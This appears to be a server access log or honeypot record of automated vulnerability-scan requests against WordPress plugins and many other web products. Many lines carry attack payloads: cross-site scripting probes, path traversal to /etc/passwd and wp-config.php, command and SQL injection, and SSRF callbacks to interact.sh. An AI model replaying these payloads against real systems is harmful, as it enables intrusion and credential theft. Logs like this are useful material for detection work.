1 | GET | /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com |
HTTP/1.1 |
1 | GET | /wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22 |
HTTP/1.1 |
1 | GET | /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd |
HTTP/1.1 |
2 | GET | /wp-content/plugins/iwp-client/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/jh-404-logger/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/jsmol2wp/php/jsmol.php?call=getRawDataFromDatabase&isform=true&query=php://filter/resource=../../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/jsmol2wp/php/jsmol.php?call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&isform=true&mimetype=text/html%20charset=utf-8 |
HTTP/1.1 |
1 | GET | /wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/lifterlms/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd |
HTTP/1.1 |
1 | GET | /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd |
HTTP/1.1 |
1 | GET | /wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg%20src%20onerror=alert(document.domain)%20x |
HTTP/1.1 |
1 | GET | /wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd |
HTTP/1.1 |
2 | GET | /wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/qards/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/qards/html2canvasproxy.php?url=https[:]// |
HTTP/1.1 |
1 | GET | /wp-content/plugins/quiz-master-next/README.md |
HTTP/1.1 |
2 | GET | /wp-content/plugins/redirection/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 |
HTTP/1.1 |
2 | GET | /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/securimage-wp/siwp_test.php/%2522/%253E%253Cscript%253Ealert%281%29;%253C/script%253E?tested=1 |
HTTP/1.1 |
1 | GET | /wp-content/plugins/sfwd-lms/ |
HTTP/1.1 |
2 | GET | /wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/simple-ajax-chat/sac-export.csv |
HTTP/1.1 |
1 | GET | /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php |
HTTP/1.1 |
2 | GET | /wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /wp-content/plugins/socialfit/popup.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&service=googleplus |
HTTP/1.1 |
1 | GET | /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract[.]sh |
HTTP/1.1 |
1 | GET | /wp-content/plugins/super-forms/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E+ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css |
HTTP/1.1 |
1 | GET | /wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
2 | GET | /wp-content/plugins/woocommerce/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-easycart/inc/admin/phpinfo.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-mail-smtp-pro/ |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-statistics/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-swimteam/include/user/download.php?abspath=/usr/share/wordpress&contenttype=text/html&file=/etc/passwd&filename=/etc/passwd&transient=1 |
HTTP/1.1 |
2 | GET | /wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E |
HTTP/1.1 |
1 | GET | /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd |
HTTP/1.1 |
2 | GET | /wp-content/themes/.git/config |
HTTP/1.1 |
1 | GET | /wp-content/themes/ |
HTTP/1.1 |
1 | GET | /wp-content/themes/altair/functions/ |
HTTP/1.1 |
1 | GET | /wp-content/themes/altair/images/ |
HTTP/1.1 |
1 | GET | /wp-content/themes/altair/images/flip/ |
HTTP/1.1 |
1 | GET | /wp-content/themes/altair/modules/ |
HTTP/1.1 |
1 | GET | /wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg |
HTTP/1.1 |
1 | GET | /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/themes/haberadam/api/mobile-info.php?id |
HTTP/1.1 |
2 | GET | /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php |
HTTP/1.1 |
1 | GET | /wp-content/themes/weekender/friend.php?id=aHR0cHM6Ly9pbnRlcmFjdC5zaA== |
HTTP/1.1 |
1 | GET | /wp-content/uploads/2LM9cxiWQixcMvVWe7jkSkKPnOO.php |
HTTP/1.1 |
1 | GET | /wp-content/uploads/ |
HTTP/1.1 |
2 | GET | /wp-content/uploads/affwp-debug.log |
HTTP/1.1 |
2 | GET | /wp-content/uploads/data.txt |
HTTP/1.1 |
1 | GET | /wp-content/uploads/database-backups/ |
HTTP/1.1 |
2 | GET | /wp-content/uploads/dump.sql |
HTTP/1.1 |
1 | GET | /wp-content/uploads/html2wp/2LM9c4GWSTxFLjN2t8m2WSOTuoW.php |
HTTP/1.1 |
1 | GET | /wp-content/uploads/html2wp/2LNn67D8kAAhDTqX74A75XOecgI.php |
HTTP/1.1 |
1 | GET | /wp-content/uploads/kaswara/fonts_icon/xitlxj/kx.php |
HTTP/1.1 |
1 | GET | /wp-content/uploads/mc4wp-debug.log |
HTTP/1.1 |
2 | GET | /wp-content/uploads/pdf-invoices/ |
HTTP/1.1 |
2 | GET | /wp-content/uploads/simple-file-list/nuclei.php |
HTTP/1.1 |
2 | GET | /wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip |
HTTP/1.1 |
1 | GET | /wp-content/uploads/workreap-temp/2LM9bYDp85dI4og6SqAvZUaPUhk.php |
HTTP/1.1 |
1 | GET | /wp-content/uploads/workreap-temp/2LNn6MD4T85lQpPOMlKRnOBjQzk.php |
HTTP/1.1 |
1 | GET | /wp-content/uploads/wp-file-manager-pro/fm_backup/ |
HTTP/1.1 |
1 | GET | /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2LM9bgnMKy2JSkkBINpbsegfvv3.svg |
HTTP/1.1 |
1 | GET | /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2LM9cL8MHrtyqI206PJEzORv8iB.txt |
HTTP/1.1 |
1 | GET | /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2LNn6KeO7ors6EUHU1kzUj520l1.txt |
HTTP/1.1 |
1 | GET | /wp-content/uploads/wpdm-cache/ |
HTTP/1.1 |
2 | GET | /wp-content/uploads/wpjobboard/ |
HTTP/1.1 |
1 | GET | /wp-includes/ALFA_DATA/ |
HTTP/1.1 |
1 | GET | /wp-includes/ |
HTTP/1.1 |
1 | GET | /wp-includes/rss-functions.php |
HTTP/1.1 |
1 | GET | /wp-includes/sym404/root/etc/passwd |
HTTP/1.1 |
2 | GET | /wp-json/acf/v3/options/a?field=plugins&id=active |
HTTP/1.1 |
1 | GET | /wp-json/anycomment/v1/auth/wordpress?redirect=https[:]//interact[.]sh?a=https[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /wp-json/anycomment/v1/auth/wordpress?redirect=https[:]//interact[.]sh |
HTTP/1.1 |
2 | GET | /wp-json/metform/v1/forms/templates/0 |
HTTP/1.1 |
1 | GET | /wp-json/wp/v2/asked-question |
HTTP/1.1 |
1 | GET | /wp-json/wp/v2/lesson/1 |
HTTP/1.1 |
1 | GET | /wp-json/wp/v2/posts |
HTTP/1.1 |
1 | GET | /wp-json/wp/v2/users/ |
HTTP/1.1 |
1 | GET | /wp-login.php.bak |
HTTP/1.1 |
1 | GET | /wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E |
HTTP/1.1 |
1 | GET | /wp-login.php |
HTTP/1.1 |
1 | GET | /wp/readme.html |
HTTP/1.1 |
2 | GET | /wp/wp-content/uploads/wpjobboard/ |
HTTP/1.1 |
1 | GET | /wpad.dat |
HTTP/1.1 |
1 | GET | /wpdmpro/list-packages/?order=asc&orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E |
HTTP/1.1 |
1 | GET | /wps/PA_WCM_Authoring_UI/proxy/http/interact.sh |
HTTP/1.1 |
1 | GET | /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBAf0FuaCgAb7VcBA!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ |
HTTP/1.1 |
2 | GET | /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBQfxRYSYCHh5mHoYWBj7-RL1DC1y3M2NXCx9jA3RiqAI8ZBbmhEQaZjooABQv7ag!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ |
HTTP/1.1 |
2 | GET | /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 |
HTTP/1.1 |
2 | GET | /wps/portal/!ut/p/z1/pZHBDoIwDIYfqZVF4DoIEg5KBEHWi9mBIAnbjCEefHqH8SARJNGe2qRf_78tEFRAWt7aRvat0bKztSD3hKPgGGROwBDjEuH4bOBxWewx9NzUOzBMki3mWRSs_M0a6IN_n_Ti5wRiZ4Kf0J9r8PEXfmTwL_0Sl_YXlvfm-CRFKLS5KvuJHAgoDXeL9wKSBkR_VkPa6QZEra1N-rrJcKglqxdV2KjuEVM-czP-AKyJL-g!/dz/d5/L2dBISEvZ0FBIS9nQSEh/ |
HTTP/1.1 |
1 | GET | /wps/portal/client/welcome/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 |
HTTP/1.1 |
1 | GET | /ws2020/ |
HTTP/1.1 |
1 | GET | /ws2021/ |
HTTP/1.1 |
1 | GET | /ws_ftp.ini |
HTTP/1.1 |
2 | GET | /www/admin/index.php |
HTTP/1.1 |
1 | GET | /www/delivery/afr.php?\")',10000000)alert(1337)setTimeout('alert(\"&refresh=10000 |
HTTP/1.1 |
1 | GET | /www/start.html |
HTTP/1.1 |
3 | GET | /xampp/.env.local |
HTTP/1.1 |
3 | GET | /xampp/.env.production |
HTTP/1.1 |
3 | GET | /xampp/.env.staging |
HTTP/1.1 |
3 | GET | /xampp/.env |
HTTP/1.1 |
3 | GET | /xampp/info.php |
HTTP/1.1 |
3 | GET | /xampp/phpinfo |
HTTP/1.1 |
1 | GET | /xampp/phpmyadmin/scripts/setup.php |
HTTP/1.1 |
1 | GET | /xmldata?item=all |
HTTP/1.1 |
1 | GET | /xmlrpc.php |
HTTP/1.1 |
1 | GET | /xprober.php |
HTTP/1.1 |
1 | GET | /yarn.lock |
HTTP/1.1 |
2 | GET | /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue&per_id=0&state=1 |
HTTP/1.1 |
1 | GET | /yyoa/common/js/menu/test.jsp?S1=(SELECT%20md5(999999999))&doType=101 |
HTTP/1.1 |
2 | GET | /zabbix/setup.php |
HTTP/1.1 |
1 | GET | /zb_system/login.php |
HTTP/1.1 |
1 | GET | /zdm/login_xdm_uc.jsp |
HTTP/1.1 |
1 | GET | /zenario/admin/welcome.php |
HTTP/1.1 |
1 | GET | /zenphoto/zp-core/setup/index.php |
HTTP/1.1 |
1 | GET | /zimbra/h/search?action&csi=1&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sfi=4&si=1&so=0&st=message |
HTTP/1.1 |
3 | GET | /zimbraAdmin/0MVzAe6pgwe5go1D.jsp |
HTTP/1.1 |
1 | GET | /zm/?view=log |
HTTP/1.1 |
1 | GET | /zp-core/setup/index.php |
HTTP/1.1 |
1 | GET | /zp/zp-core/setup/index.php |
HTTP/1.1 |
1 | GET | /~user/%250D%250ASet-Cookie:crlfinjection |
HTTP/1.1 |
3 | OPTIONS | / |
HTTP/1.1 |
2 | OPTIONS | /api/v1 |
HTTP/1.1 |
2 | OPTIONS | /api/v2 |
HTTP/1.1 |
1 | POST | /(download)/tmp/poc.txt |
HTTP/1.1 |
1 | POST | /+CSCOE+/saml/sp/acs?tgname=a |
HTTP/1.1 |
1 | POST | /.%250d./.%250d./.%250d./.%250d./bin/sh |
HTTP/1.1 |
1 | POST | /./RestAPI/Connection |
HTTP/1.1 |
2 | POST | /./RestAPI/LogonCustomization |
HTTP/1.1 |
1 | POST | /.antproxy.php |
HTTP/1.1 |
1 | POST | /?BazaR&action=saisir_fiche&id=2&vue=saisir |
HTTP/1.1 |
1 | POST | /?rest_route=/notificationx/v1/analytics |
HTTP/1.1 |
2 | POST | /?s=index/index/index |
HTTP/1.1 |
1 | POST | /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData |
HTTP/1.1 |
2 | POST | /CTCWebService/CTCWebServiceBean/ConfigServlet |
HTTP/1.1 |
1 | POST | /Config/SaveUploadedHotspotLogoFile |
HTTP/1.1 |
2 | POST | /EemAdminService/EemAdmin |
HTTP/1.1 |
3 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
1 | POST | /HyperGraphQL |
HTTP/1.1 |
1 | POST | /MUP/ |
HTTP/1.1 |
2 | POST | /NateMail.php |
HTTP/1.1 |
1 | POST | /OA_HTML/lcmServiceController.jsp |
HTTP/1.1 |
1 | POST | /PDC/ajaxreq.php?DIAGNOSIS=PING&PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd |
HTTP/1.1 |
1 | POST | /RPC2_Login |
HTTP/1.1 |
2 | POST | /RPC2 |
HTTP/1.1 |
1 | POST | /Side.php |
HTTP/1.1 |
1 | POST | /TransferredOutModal.php?modfunc=detail |
HTTP/1.1 |
1 | POST | /Upload/upload_file.php?l=test |
HTTP/1.1 |
1 | POST | /ViewPoint/admin/Site/ViewPointLogin |
HTTP/1.1 |
1 | POST | /VisionHubWebApi/api/Login |
HTTP/1.1 |
1 | POST | /WEB_VMS/LEVEL15/ |
HTTP/1.1 |
1 | POST | /XMLCHART |
HTTP/1.1 |
2 | POST | /ZMC_Admin_Login |
HTTP/1.1 |
1 | POST | /___graphql |
HTTP/1.1 |
2 | POST | /_async/AsyncResponseService |
HTTP/1.1 |
1 | POST | /_bulk |
HTTP/1.1 |
6 | POST | /_ignition/execute-solution |
HTTP/1.1 |
1 | POST | /_search?pretty |
HTTP/1.1 |
1 | POST | /_search |
HTTP/1.1 |
1 | POST | /account/index.php |
HTTP/1.1 |
1 | POST | /actuator/gateway/refresh |
HTTP/1.1 |
1 | POST | /actuator/gateway/routes/2LNn5oP1AFK20lTSReL4tnGqAJr |
HTTP/1.1 |
3 | POST | /admin/ajax.php?action=login |
HTTP/1.1 |
1 | POST | /admin/index.php |
HTTP/1.1 |
4 | POST | /ajax/render/widget_tabbedcontainer_tab_panel |
HTTP/1.1 |
2 | POST | /ajaxPages/writeBrowseFilePathAjax.php |
HTTP/1.1 |
1 | POST | /altair |
HTTP/1.1 |
1 | POST | /analytics/telemetry/ph/api/hyper/send?_c&_i=test |
HTTP/1.1 |
1 | POST | /api/agent/tabs/agentData |
HTTP/1.1 |
1 | POST | /api/authenticate |
HTTP/1.1 |
1 | POST | /api/cask/graphql-playground |
HTTP/1.1 |
2 | POST | /api/content/ |
HTTP/1.1 |
2 | POST | /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 |
HTTP/1.1 |
2 | POST | /api/experimental/dags/example_trigger_target_dag/dag_runs |
HTTP/1.1 |
1 | POST | /api/external/7.0/system.System.get_infos |
HTTP/1.1 |
3 | POST | /api/graphql |
HTTP/1.1 |
1 | POST | /api/login |
HTTP/1.1 |
1 | POST | /api/system/sessions |
HTTP/1.1 |
1 | POST | /api/timelion/run |
HTTP/1.1 |
1 | POST | /api/user/signup/step2 |
HTTP/1.1 |
2 | POST | /api/users |
HTTP/1.1 |
1 | POST | /api/v1/login/oauth2/auth |
HTTP/1.1 |
1 | POST | /api/v1/method.callAnon/sendForgotPasswordEmail |
HTTP/1.1 |
1 | POST | /api/v4/auth |
HTTP/1.1 |
1 | POST | /api/v4/ci/lint?include_merged_yaml=true |
HTTP/1.1 |
2 | POST | /apisix/admin/user/login |
HTTP/1.1 |
1 | POST | /apisix/batch-requests |
HTTP/1.1 |
2 | POST | /app/options.py |
HTTP/1.1 |
1 | POST | /apply_sec.cgi |
HTTP/1.1 |
1 | POST | /artifactory/ui/auth/login?_spring_security_remember_me=false |
HTTP/1.1 |
1 | POST | /assets/_core/php/profile.php |
HTTP/1.1 |
1 | POST | /assets/php/profile.php |
HTTP/1.1 |
1 | POST | /aura |
HTTP/1.1 |
1 | POST | /auth/check |
HTTP/1.1 |
2 | POST | /auth/newpassword |
HTTP/1.1 |
2 | POST | /auth/requestreset |
HTTP/1.1 |
1 | POST | /auth/tokens |
HTTP/1.1 |
1 | POST | /autodiscover/autodiscover.json |
HTTP/1.1 |
6 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /boafrm/formSysCmd |
HTTP/1.1 |
1 | POST | /bsh.servlet.BshServlet |
HTTP/1.1 |
2 | POST | /carbon/admin/login_action.jsp |
HTTP/1.1 |
2 | POST | /carbon/generic/save_artifact_ajaxprocessor.jsp |
HTTP/1.1 |
1 | POST | /cas/v1/tickets/ |
HTTP/1.1 |
1 | POST | /casa/nodes/thumbprints |
HTTP/1.1 |
1 | POST | /ccmadmin/j_security_check |
HTTP/1.1 |
1 | POST | /ccms/index.php |
HTTP/1.1 |
1 | POST | /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh |
HTTP/1.1 |
2 | POST | /cgi-bin/login.cgi |
HTTP/1.1 |
2 | POST | /cgi-bin/logo_extra_upload.cgi |
HTTP/1.1 |
2 | POST | /cgi-bin/luci/ |
HTTP/1.1 |
1 | POST | /cgi-bin/nightled.cgi |
HTTP/1.1 |
2 | POST | /cgi-bin/supportInstaller |
HTTP/1.1 |
1 | POST | /cgi-bin/system_log.cgi |
HTTP/1.1 |
2 | POST | /cgi-bin/system_mgr.cgi |
HTTP/1.1 |
2 | POST | /cgi-bin/webproc |
HTTP/1.1 |
1 | POST | /cgi/login.cgi |
HTTP/1.1 |
2 | POST | /cgi/networkDiag.cgi |
HTTP/1.1 |
1 | POST | /cgi?2 |
HTTP/1.1 |
2 | POST | /checkValid |
HTTP/1.1 |
2 | POST | /client |
HTTP/1.1 |
4 | POST | /cobbler_api |
HTTP/1.1 |
2 | POST | /conf_mail.php |
HTTP/1.1 |
1 | POST | /confluence/pages/createpage-entervariables.action?SpaceKey=x |
HTTP/1.1 |
1 | POST | /connect/register |
HTTP/1.1 |
1 | POST | /console/css/%25252e%25252e%25252fconsole.portal |
HTTP/1.1 |
1 | POST | /console/images/%25252e%25252e%25252fconsole.portal |
HTTP/1.1 |
1 | POST | /content/2LM9bpa4sEG3PX7P8KeBflL8JIt.af.internalsubmit.json |
HTTP/1.1 |
1 | POST | /content/2LM9bpa4sEG3PX7P8KeBflL8JIt |
HTTP/1.1 |
1 | POST | /content/2LNn5kRZePwCCSIzZOHnswuyp9r.af.internalsubmit.json |
HTTP/1.1 |
1 | POST | /content/2LNn5kRZePwCCSIzZOHnswuyp9r |
HTTP/1.1 |
1 | POST | /control/login |
HTTP/1.1 |
2 | POST | /controller/login.php?acao=autenticar |
HTTP/1.1 |
1 | POST | /controller/origemdb.php?idselorigem=ATIVOS |
HTTP/1.1 |
1 | POST | /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE |
HTTP/1.1 |
1 | POST | /cu.html |
HTTP/1.1 |
1 | POST | /dashboard/proc.php?type=login |
HTTP/1.1 |
1 | POST | /data/login |
HTTP/1.1 |
1 | POST | /debug/pyspidervulntest/run |
HTTP/1.1 |
2 | POST | /dip/api/login |
HTTP/1.1 |
2 | POST | /directdata/direct/router |
HTTP/1.1 |
2 | POST | /dolphinscheduler/login |
HTTP/1.1 |
1 | POST | /druid/indexer/v1/sampler?for=connect |
HTTP/1.1 |
1 | POST | /druid/submitLogin |
HTTP/1.1 |
1 | POST | /en/php/usb_sync.php |
HTTP/1.1 |
2 | POST | /examples/jsp/security/protected/j_security_check |
HTTP/1.1 |
1 | POST | /fcgi-bin/wgsetcgi |
HTTP/1.1 |
4 | POST | /fileDownload?action=downloadBackupFile |
HTTP/1.1 |
1 | POST | /filemanager/upload.php |
HTTP/1.1 |
1 | POST | /fileupload/toolsAny |
HTTP/1.1 |
1 | POST | /functionRouter |
HTTP/1.1 |
1 | POST | /general/userinfo.php?UID=1 |
HTTP/1.1 |
1 | POST | /geoserver/j_spring_security_check |
HTTP/1.1 |
2 | POST | /getcfg.php |
HTTP/1.1 |
2 | POST | /goform/setSysAdm |
HTTP/1.1 |
1 | POST | /goform/setmac |
HTTP/1.1 |
1 | POST | /graphiql.js |
HTTP/1.1 |
1 | POST | /graphiql/finland |
HTTP/1.1 |
1 | POST | /graphiql |
HTTP/1.1 |
1 | POST | /graphql.php |
HTTP/1.1 |
1 | POST | /graphql/schema.yaml |
HTTP/1.1 |
1 | POST | /graphql/v1 |
HTTP/1.1 |
3 | POST | /graphql |
HTTP/1.1 |
2 | POST | /guest_auth/guestIsUp.php |
|
1 | POST | /htdocs/login/login.lua |
HTTP/1.1 |
1 | POST | /http/index.php |
